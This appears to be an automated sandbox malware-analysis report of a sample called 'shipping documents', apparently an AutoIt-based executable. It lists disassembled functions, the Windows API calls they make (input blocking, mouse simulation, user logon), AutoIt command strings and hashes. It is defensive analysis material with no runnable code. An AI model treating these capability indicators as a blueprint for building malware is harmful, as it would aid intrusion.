Function 0067A395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00678F97,?,?,?,00000001), ref: 0067A39A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0067A3A3

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 4e4dc6553db30eb5a39efbba84e3bd979809a93da6eddfa2a36a4b719be33350
Instruction ID: a56d2f2bf35eee2812ecab3a921bb16622b54cce86ecaa3eb58277901477a0f3
Opcode Fuzzy Hash: 4e4dc6553db30eb5a39efbba84e3bd979809a93da6eddfa2a36a4b719be33350
Instruction Fuzzy Hash: E7B09231455208ABCB002B95EC09B883F6AEB44AA2F429022F60E84060CF6254508AD1

Function 0067F419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9f8b30af45c62f0f5d61847eeef1aecfe7bc98884121b7fe4bd6194632acff2
Instruction ID: 279f0ec82574dcbfb6ca764dfd839ebd47ba479345ae73ba0470797f7010836d
Opcode Fuzzy Hash: c9f8b30af45c62f0f5d61847eeef1aecfe7bc98884121b7fe4bd6194632acff2
Instruction Fuzzy Hash: 4332F721D69F414DD7239A34D872336A24AAFB73D4F15E737F819B9AA6EF29C4834100

Function 0068267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fdf5d3bf64598fdffaf8162dcedb5b2c2ae489d37a3a1330d511170de2189d9
Instruction ID: df7b4a5ee5fb5c693b8c1cc44888c1063ebd7ce1b98177d0c8f82a150132e48b
Opcode Fuzzy Hash: 6fdf5d3bf64598fdffaf8162dcedb5b2c2ae489d37a3a1330d511170de2189d9
Instruction Fuzzy Hash: 25B10230D2AF814DD32396398871336B69DAFBB2C5F52E71BFC1678D62EB2195834241

Function 006C41FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 006C4218

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: dc256feb6b510950eee5680db1f29ba355f5c895d7e134560ec98e7df6d3e77d
Instruction ID: 019e3565370d84114d1cf30463083419a5411d2a84cc39452fef9d54672a311c
Opcode Fuzzy Hash: dc256feb6b510950eee5680db1f29ba355f5c895d7e134560ec98e7df6d3e77d
Instruction Fuzzy Hash: 9FE04F312402149FC710EF5AD845E9AF7EAEF94761F00802AFC4AC7352DA75ED458BA0

Function 006B4EF5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 006B4F18

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 41139644021ebf1e935ad4ad63f1b710d665969cff5bd1ae5244760ea95d6c1a
Instruction ID: 43af598aaecb17ab1ec31e92d9e04cbedd5280f38b447047b29e1cb65348c539
Opcode Fuzzy Hash: 41139644021ebf1e935ad4ad63f1b710d665969cff5bd1ae5244760ea95d6c1a
Instruction Fuzzy Hash: 91D09EF456461579FD184F20AC1FFF6130FE3D0791F9459897202976C39CE5A8D1A235

Function 006A8C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,006A88D1), ref: 006A8CB3

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: ea9ff579df30263cceb23f0a4615e97e57410770e43769733ace04ba67fe2dde
Instruction ID: 18e9a6d304c3c2378e32407b3a82ab543a13499a195027a6d8f3d7b10c41c67c
Opcode Fuzzy Hash: ea9ff579df30263cceb23f0a4615e97e57410770e43769733ace04ba67fe2dde
Instruction Fuzzy Hash: 22D09E3226450EABEF019FA4DD05EBE3B6AEB04B01F408511FE16D61A1C775D935AB60

Function 00692230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00692242

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 96ddeafe7dd5e47a47826983c9fbf8dc50a96ee6c1c0a4b0b6e8e78ce9594a6a
Instruction ID: 43143bdcfabcee8f05546a72411f922afe3dbf1cbe8949e168b82eeea8ca0852
Opcode Fuzzy Hash: 96ddeafe7dd5e47a47826983c9fbf8dc50a96ee6c1c0a4b0b6e8e78ce9594a6a
Instruction Fuzzy Hash: 99C048F1C0110AEBDB05DBA0DA98DEEB7BEAB08314F2040A6A102F2100E7749B448A71

Function 0067A364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0067A36A

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 7f8642122c5412819d434bc11e6b7155b612cb1b2cf1f240f27910128a85c00c
Instruction ID: 5a25bd8b95388497204cc55ae1577e614ddf8e814b5708a76a623ee28e9d0870
Opcode Fuzzy Hash: 7f8642122c5412819d434bc11e6b7155b612cb1b2cf1f240f27910128a85c00c
Instruction Fuzzy Hash: A9A0243000010CF7CF001F45FC044447F5DD7001D07014031F40D40031CF33541045C0

Function 00668A0E Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f830bfb78104a99eb37cd5f9e771e7eb1fc7736eb585c781c06d71eb7f942cb
Instruction ID: bf7047d232f6729fe4d078efe7f852091dd435761b80dd0ebf3baf8a2d3b644d
Opcode Fuzzy Hash: 1f830bfb78104a99eb37cd5f9e771e7eb1fc7736eb585c781c06d71eb7f942cb
Instruction Fuzzy Hash: B822F530905616CFDF28DB38C4946BD77A3EB42304F68866AD8439B792DB349D82CB61

Function 00672405 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 0fd1e358f9af722d1d8fe744d1158b774459a7b4c6b2ddb15cecc371ad10df5d
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: A5C195322050930ADF2D463DD43507EBAE25AA37B131A875EE4BBCF6C5EF14D564D620

Function 0067283A Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 24747cf4b818010c2ef98c5b5f316d0c727620e1e94bf98fd094cd04665d51e8
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: A5C1B53220519309DF6D4A3E843507EBBE25BA37B131A476EE4BADF6C4EF24D524D620

Function 006C7B1B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 006C7B70
DeleteObject.GDI32(00000000), ref: 006C7B82
DestroyWindow.USER32 ref: 006C7B90
GetDesktopWindow.USER32 ref: 006C7BAA
GetWindowRect.USER32(00000000), ref: 006C7BB1
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 006C7CF2
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 006C7D02
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006C7D4A
GetClientRect.USER32(00000000,?), ref: 006C7D56
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 006C7D90
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006C7DB2
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006C7DC5
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006C7DD0
GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006C7DD9
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006C7DE8
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006C7DF1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006C7DF8
GlobalFree.KERNEL32(00000000), ref: 006C7E03
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006C7E15
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,006E2CAC,00000000), ref: 006C7E2B
GlobalFree.KERNEL32(00000000), ref: 006C7E3B
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 006C7E61
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 006C7E80
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006C7EA2
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 006C808F

Strings

static, xrefs: 006C7D8A, 006C7EE1
DISPLAY, xrefs: 006C7EF2
, xrefs: 006C8015
AutoIt v3, xrefs: 006C7D42

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 12e74ccd730d018d310ee0143405494b5c8a7fc749ff0571ea5fe62f322ee418
Instruction ID: 0de0ef4ea4dfdbb9eb8e55bc9a0e157ccc71c13f86fa9c451173b8e4d4ed98ec
Opcode Fuzzy Hash: 12e74ccd730d018d310ee0143405494b5c8a7fc749ff0571ea5fe62f322ee418
Instruction Fuzzy Hash: F7025C71900119EFDB14DF68DC89EAE7BBAFB48310F14815DF916AB2A1CB74AD01CB64

Function 006D37F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,006DF910), ref: 006D38AF
IsWindowVisible.USER32(?), ref: 006D38D3

Strings

EDITPASTE, xrefs: 006D3BE7
TABLEFT, xrefs: 006D390F
ISENABLED, xrefs: 006D38F3
GETCURRENTCOL, xrefs: 006D3BB0
SELECTSTRING, xrefs: 006D3A8E
TABRIGHT, xrefs: 006D3925
ISCHECKED, xrefs: 006D3AC1
ISVISIBLE, xrefs: 006D38BF
ADDSTRING, xrefs: 006D399E
FINDSTRING, xrefs: 006D39FE
CURRENTTAB, xrefs: 006D3945
SENDCOMMANDID, xrefs: 006D3C62
DELSTRING, xrefs: 006D39D1
SETCURRENTSELECTION, xrefs: 006D3A3E
GETCURRENTLINE, xrefs: 006D3B75
GETSELECTED, xrefs: 006D3B2B
CHECK, xrefs: 006D3AF5
GETCURRENTSELECTION, xrefs: 006D3A6B
HIDEDROPDOWN, xrefs: 006D3988
UNCHECK, xrefs: 006D3B0B
GETLINE, xrefs: 006D3C23
SHOWDROPDOWN, xrefs: 006D3968
GETLINECOUNT, xrefs: 006D3B4E

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 3f594fc05808b278b17aab4884f1ebd317ed519d977216533f8c69645352b57b
Instruction ID: b87ce7d0460504067565c13931f714b3616587a3178fcc420779a0a400d923e1
Opcode Fuzzy Hash: 3f594fc05808b278b17aab4884f1ebd317ed519d977216533f8c69645352b57b
Instruction Fuzzy Hash: D9D18130614315DBCB54EF10C451AAAB7E3AF54344F14846EB8865B3E2CB31EF0ACB66

Function 006DA849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 006DA89F
GetSysColorBrush.USER32(0000000F), ref: 006DA8D0
GetSysColor.USER32(0000000F), ref: 006DA8DC
SetBkColor.GDI32(?,000000FF), ref: 006DA8F6
SelectObject.GDI32(?,?), ref: 006DA905
InflateRect.USER32(?,000000FF,000000FF), ref: 006DA930
GetSysColor.USER32(00000010), ref: 006DA938
CreateSolidBrush.GDI32(00000000), ref: 006DA93F
FrameRect.USER32(?,?,00000000), ref: 006DA94E
DeleteObject.GDI32(00000000), ref: 006DA955
InflateRect.USER32(?,000000FE,000000FE), ref: 006DA9A0
FillRect.USER32(?,?,?), ref: 006DA9D2
GetWindowLongW.USER32(?,000000F0), ref: 006DA9FD

Part of subcall function 006DAB60: GetSysColor.USER32(00000012), ref: 006DAB99
Part of subcall function 006DAB60: SetTextColor.GDI32(?,?), ref: 006DAB9D
Part of subcall function 006DAB60: GetSysColorBrush.USER32(0000000F), ref: 006DABB3
Part of subcall function 006DAB60: GetSysColor.USER32(0000000F), ref: 006DABBE
Part of subcall function 006DAB60: GetSysColor.USER32(00000011), ref: 006DABDB
Part of subcall function 006DAB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 006DABE9
Part of subcall function 006DAB60: SelectObject.GDI32(?,00000000), ref: 006DABFA
Part of subcall function 006DAB60: SetBkColor.GDI32(?,00000000), ref: 006DAC03
Part of subcall function 006DAB60: SelectObject.GDI32(?,?), ref: 006DAC10
Part of subcall function 006DAB60: InflateRect.USER32(?,000000FF,000000FF), ref: 006DAC2F
Part of subcall function 006DAB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 006DAC46
Part of subcall function 006DAB60: GetWindowLongW.USER32(00000000,000000F0), ref: 006DAC5B

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 7d07bbf80cdf1559783794ecf43777170cc7c07203445f42c913ce2e123e9c91
Instruction ID: e4e640ba67d3197e179eb4d38421402c800be60956b91378d22c1e997cbdb210
Opcode Fuzzy Hash: 7d07bbf80cdf1559783794ecf43777170cc7c07203445f42c913ce2e123e9c91
Instruction Fuzzy Hash: 75A1A371809301AFD7109F64DC08E5B7BAAFF88321F145B2AF952962E0D735D945CB52

Function 00652C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00652CA2
DeleteObject.GDI32(00000000), ref: 00652CE8
DeleteObject.GDI32(00000000), ref: 00652CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00652CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00652D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 0068C68B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0068C6C4
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0068CAED

Part of subcall function 00651B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00652036,?,00000000,?,?,?,?,006516CB,00000000,?), ref: 00651B9A

SendMessageW.USER32(?,00001053), ref: 0068CB2A
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0068CB41
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0068CB57
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0068CB62

Strings

0, xrefs: 0068C981

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 8895c27b21e2fd45dde3a7b141bdc7085e0994550530687a40b95bb8674355b5
Instruction ID: 1c089eabae9c0765695af9a97d3ac3b0858bdaabbc69f6512c9c798ad586da87
Opcode Fuzzy Hash: 8895c27b21e2fd45dde3a7b141bdc7085e0994550530687a40b95bb8674355b5
Instruction Fuzzy Hash: 2412B030600202EFDB54EF24C894BA9BBE3BF45321F544669F996DB662C731EC46CB61

Function 006C77BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 006C77F1
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 006C78B0
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 006C78EE
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 006C7900
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 006C7946
GetClientRect.USER32(00000000,?), ref: 006C7952
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 006C7996
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 006C79A5
GetStockObject.GDI32(00000011), ref: 006C79B5
SelectObject.GDI32(00000000,00000000), ref: 006C79B9
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 006C79C9
GetDeviceCaps.GDI32(00000000,0000005A), ref: 006C79D2
DeleteDC.GDI32(00000000), ref: 006C79DB
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 006C7A07
SendMessageW.USER32(00000030,00000000,00000001), ref: 006C7A1E
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 006C7A59
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 006C7A6D
SendMessageW.USER32(00000404,00000001,00000000), ref: 006C7A7E
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 006C7AAE
GetStockObject.GDI32(00000011), ref: 006C7AB9
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 006C7AC4
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 006C7ACE

Strings

static, xrefs: 006C7990, 006C7AA8
